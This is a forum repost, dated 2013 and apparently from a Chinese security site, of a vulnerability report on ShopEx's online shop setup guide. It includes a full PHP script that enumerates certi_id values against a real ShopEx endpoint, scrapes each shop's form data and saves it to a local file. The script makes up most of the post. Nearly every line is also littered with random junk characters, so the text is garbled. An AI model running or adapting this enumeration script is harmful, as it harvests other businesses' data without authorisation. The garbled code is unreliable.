|
|
简要描述:5 k. ?+ D& g/ _/ K4 B
ShopEx某接口缺陷,可遍历所有网站5 r+ e# n& i7 O1 m) `% y1 u6 m
详细说明:6 y9 {2 t' @$ y7 T0 {5 h# d
问题出现在shopex 网店使用向导页面 3 h n1 K( y0 G( [9 d9 ]
# ?: F+ S% a5 s$ |- k# W
7 I2 l5 G3 j& m( @( W O* C# u
* e4 E+ s; ]- q
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=1 J( t$ j3 S* ]* P$ C
3 z' c9 e2 f0 D# a( ]
% F c' ^" [- S* ^" B6 m# p) ^; x P3 ]5 _
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
9 k( \5 R6 s7 m7 V
. Z @& h. n: d/ P5 H- J/ [" o) I1 J$ i* \3 a2 ~: J$ i
8 ]. G- a; U/ z! ~* z
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 D. c! K! Y' Q& g8 R d4 A
1 P$ J) Q1 |3 Q! u$ U, b* O3 l. p- x j7 g# L9 J2 i
; N4 _/ ]' j( d1 J
<?php
% Q, F$ A# e/ C: ?, H+ O9 }5 x1 B
/ u. J6 `2 P, x3 X for ($i=1; $i < 10000; $i++) { //遍历 [. h) y4 p& s# ?$ L
9 J+ B; c* z4 v7 h( d ShowshopExD($i);8 i# a! f* Z* |1 v6 i# {) o5 m
2 h. {! a1 r* b$ _; W5 Z }2 z2 D6 X4 Y- W; A
0 |* w# g" [; b! { function ShowshopExD($cid) {; Q& s( z n1 c/ b6 ?
$ g% m7 p! D4 J6 m R
$url='http://guide.ecos.shopex.cn/step2.php';. n/ R5 g0 { e; i0 i+ G0 q' d3 S
. q5 I6 m2 ^$ }5 B1 S* z
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');1 p) t: L8 u: o* l2 K/ N; l; w3 h$ D
& v7 K6 h+ |3 A( k! p# z8 ?. U $url = $url.'?refer='.$refer;. z9 p( e/ v1 }" s
6 c, a- N) X- v% _+ W9 U $ch = curl_init($url);1 l, J/ N3 F, {: J; Z
- _- C+ [6 q' U
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;0 p! g) ]1 Q! S$ z
% ~( ^+ e4 a6 K5 k. x/ _3 p, ]
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;0 {1 o! w) l) f6 u
; `9 ?0 Y+ ~* d $result = curl_exec($ch);" x7 T# w' W0 Y* g9 K1 T& c
7 P; U4 G; t% A3 A' ?
$result = mb_convert_encoding($result, "gb2312", "UTF-8");( Z, w. W; z- R) D$ C; P
* y3 E- N. V$ z4 E if(strpos($result,$refer))
8 v, D/ K# ^% c9 O; u! j# V
+ e9 ~* @8 ]( c- @3 U) d7 E {2 N* G1 w$ s Y1 u; S
/ ^1 H" d+ K' _- r- X0 [0 e y, F
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件% w/ t7 [- k' R0 b2 w( `1 _
6 M4 b) k4 |1 s- G" G preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
$ t" e2 H: ] A% l7 d2 S, D4 h |- H( C
foreach ($value[1] as $key) {
+ B8 ]. @" O5 O) \( H6 z$ y7 [6 R. U) D9 f
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
) M8 n) Z% e \9 I# H9 i
, R2 ]5 f+ f% u, D1 G1 h. h echo $res[1][0].':'.$res[3][0]."\r\n";
: {2 x9 N/ c' w1 f9 L5 D
& l6 t4 G/ {6 L5 Z3 v6 Z V2 H $col =$res[1][0].':'.$res[3][0]."\r\n";
" b& p% W+ _/ [; m2 |1 E& M
) Z$ S6 l2 @" ?2 Z fwrite($fp, $col, strlen($col));
& ~2 K9 n: l8 g8 W* k
' z( }* m \$ j) z# `2 {5 N }$ M I9 g: [; B6 V
- ^) Q* u0 L/ A% i7 G! |* |% j echo '--------------------------------'."\r\n";
. w* }7 M! K2 S! y& |; l* W3 d# B- L; d2 r. R W
fclose($fp);
! P1 o0 Q$ ^# w6 \* F) z
4 R) i5 W4 o/ O }
& ?9 M4 c" o( L4 t& Q, {+ o) Q
& ]. O: ^& D" e6 J+ W2 Z% V. r flush();
6 y7 j l+ {* ?
1 _ V7 s+ I; W- x2 d1 H3 {" @* D' k curl_close($ch);+ p, _' _+ m3 z5 N
, }1 a! u3 B% S9 Z1 U }8 F+ r* ]1 B. _, B# o' V4 @. [
) t6 N* l, g( M, l3 ^# c7 Q" T?>
: J4 @3 X1 e0 ^, ]( C' o3 K4 Y漏洞证明:
, }: o; I9 f( {' C2 c2 i( Ahttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
$ W2 d7 j" s: I3 P' k: Irefer换成其他加密方式8 m' ^$ I. b: N
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对